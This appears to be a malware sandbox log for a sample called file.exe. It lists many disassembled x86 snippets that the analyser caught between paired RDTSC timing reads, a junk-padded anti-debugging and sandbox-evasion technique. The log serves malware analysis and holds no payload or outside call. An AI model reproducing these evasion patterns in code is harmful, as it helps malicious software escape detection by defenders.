Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF28F second address: 7CF299 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF5C3 second address: 7CF5C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF5C7 second address: 7CF5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF5CD second address: 7CF5D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF5D3 second address: 7CF5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF5D7 second address: 613B70 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4D45034D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F4D45034D1Fh 0x00000012 nop 0x00000013 ja 00007F4D45034D22h 0x00000019 push dword ptr [ebp+122D0FF5h] 0x0000001f push edx 0x00000020 and cl, 00000042h 0x00000023 pop edi 0x00000024 jmp 00007F4D45034D1Eh 0x00000029 call dword ptr [ebp+122D23D5h] 0x0000002f pushad 0x00000030 clc 0x00000031 xor eax, eax 0x00000033 jmp 00007F4D45034D22h 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c stc 0x0000003d mov dword ptr [ebp+122D3A39h], eax 0x00000043 mov dword ptr [ebp+122D23D0h], ebx 0x00000049 mov esi, 0000003Ch 0x0000004e mov dword ptr [ebp+122D2382h], edx 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 sub dword ptr [ebp+122D23D0h], ecx 0x0000005e mov dword ptr [ebp+122D2577h], ecx 0x00000064 lodsw 0x00000066 clc 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D24D9h], edi 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 mov dword ptr [ebp+122D24F2h], ecx 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e jne 00007F4D45034D1Ch 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF807 second address: 7CF80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF95D second address: 7CF961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFE3E second address: 7CFE8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4D44D0519Bh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D31F3h] 0x00000016 mov edx, 43DAA603h 0x0000001b push 0000001Eh 0x0000001d movzx ecx, si 0x00000020 nop 0x00000021 jmp 00007F4D44D0519Dh 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jne 00007F4D44D05196h 0x00000030 jmp 00007F4D44D0519Eh 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFE8B second address: 7CFE91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFE91 second address: 7CFE95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFFEB second address: 7CFFF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F4D45034D16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D00E3 second address: 7D0128 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F4D44D0519Ah 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F4D44D0519Fh 0x0000001d mov eax, dword ptr [eax] 0x0000001f ja 00007F4D44D0519Eh 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D0128 second address: 7D012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D0275 second address: 7D027A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D027A second address: 7D02BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4D45034D16h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov ecx, 6FF6A8ADh 0x00000013 lea eax, dword ptr [ebp+1248EF0Bh] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F4D45034D18h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov dword ptr [ebp+1248090Eh], eax 0x00000039 nop 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push esi 0x0000003e pop esi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D02BE second address: 7AF999 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F4D44D05196h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 jno 00007F4D44D051A8h 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F4D44D05198h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 push edi 0x00000038 and ecx, dword ptr [ebp+122D2A1Fh] 0x0000003e pop edx 0x0000003f pushad 0x00000040 mov cx, 1451h 0x00000044 stc 0x00000045 popad 0x00000046 call dword ptr [ebp+122D1BE0h] 0x0000004c jo 00007F4D44D051BDh 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AF999 second address: 7AF99D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FA8D9 second address: 7FA8DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FAA50 second address: 7FAA5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FAA5C second address: 7FAA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FABDC second address: 7FABED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F4D45034D1Ch 0x0000000b jne 00007F4D45034D16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FABED second address: 7FABF2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FAEBA second address: 7FAEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F4D45034D1Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FB030 second address: 7FB034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FB034 second address: 7FB05E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4D45034D16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F4D45034D32h 0x00000012 jmp 00007F4D45034D26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77EBC0 second address: 77EBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D051A1h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F4D44D05196h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77EBE2 second address: 77EBE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80319A second address: 80319E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8038AB second address: 8038BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 jbe 00007F4D45034D16h 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8038BE second address: 8038E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F4D44D051ABh 0x0000000e jmp 00007F4D44D051A5h 0x00000013 js 00007F4D44D0519Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803C04 second address: 803C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803C08 second address: 803C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804189 second address: 804194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D083 second address: 77D08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808E93 second address: 808E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808E97 second address: 808E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80914B second address: 809151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 809151 second address: 809193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F4D44D051A7h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F4D44D051A7h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 809943 second address: 809948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 809C41 second address: 809C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 809C63 second address: 809C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D20h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80D3D1 second address: 80D424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F4D44D051A8h 0x0000000a jmp 00007F4D44D051A5h 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 ja 00007F4D44D05196h 0x00000018 pop edi 0x00000019 push esi 0x0000001a je 00007F4D44D05196h 0x00000020 jnc 00007F4D44D05196h 0x00000026 pop esi 0x00000027 pushad 0x00000028 jp 00007F4D44D05196h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80D424 second address: 80D42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81054B second address: 810559 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4D44D05198h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8132B9 second address: 8132C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8132C0 second address: 8132DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4D44D0519Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8132DD second address: 8132E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 816E72 second address: 816E7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 816E7B second address: 816E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 816E82 second address: 816E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4D44D05196h 0x0000000a jp 00007F4D44D05196h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81687C second address: 816886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 816886 second address: 81689F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D051A5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81689F second address: 8168B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81E9A3 second address: 81E9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81D5C7 second address: 81D5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81D5CB second address: 81D5FA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4D44D05196h 0x00000008 jmp 00007F4D44D051A3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F4D44D0519Ch 0x00000014 pop ecx 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81DA3E second address: 81DA48 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4D45034D22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81DD9B second address: 81DDBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4D44D051A5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81E70F second address: 81E715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81E715 second address: 81E71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 822640 second address: 82265F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4D45034D27h 0x00000008 jmp 00007F4D45034D21h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82265F second address: 822663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 821CB4 second address: 821CDE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4D45034D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007F4D45034D16h 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007F4D45034D20h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 821E25 second address: 821E35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F4D44D05196h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 821E35 second address: 821E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82222E second address: 82223A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 827A35 second address: 827A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 827A3B second address: 827A45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82846A second address: 828489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4D45034D29h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 828F0F second address: 828F39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4D44D051C7h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007F4D44D051A0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829215 second address: 829219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829523 second address: 82952D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82952D second address: 82953D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4D45034D22h 0x00000008 jl 00007F4D45034D16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82953D second address: 829545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 831B85 second address: 831B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 831E2F second address: 831E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D0519Fh 0x00000009 popad 0x0000000a jmp 00007F4D44D0519Ch 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F4D44D0519Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 831E62 second address: 831E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 831E68 second address: 831E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F4D44D051A4h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F4D44D051A4h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83253D second address: 832547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8326AC second address: 8326EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F4D44D051A8h 0x00000011 js 00007F4D44D05196h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83BAFF second address: 83BB03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83BB03 second address: 83BB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83BB0E second address: 83BB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b jns 00007F4D45034D18h 0x00000011 popad 0x00000012 pushad 0x00000013 jbe 00007F4D45034D2Ch 0x00000019 jmp 00007F4D45034D26h 0x0000001e jnl 00007F4D45034D18h 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83BB4A second address: 83BB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787289 second address: 7872A1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4D45034D16h 0x00000008 jmp 00007F4D45034D1Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839D96 second address: 839DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839EDE second address: 839EF4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F4D45034D16h 0x00000010 jns 00007F4D45034D16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839EF4 second address: 839EFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
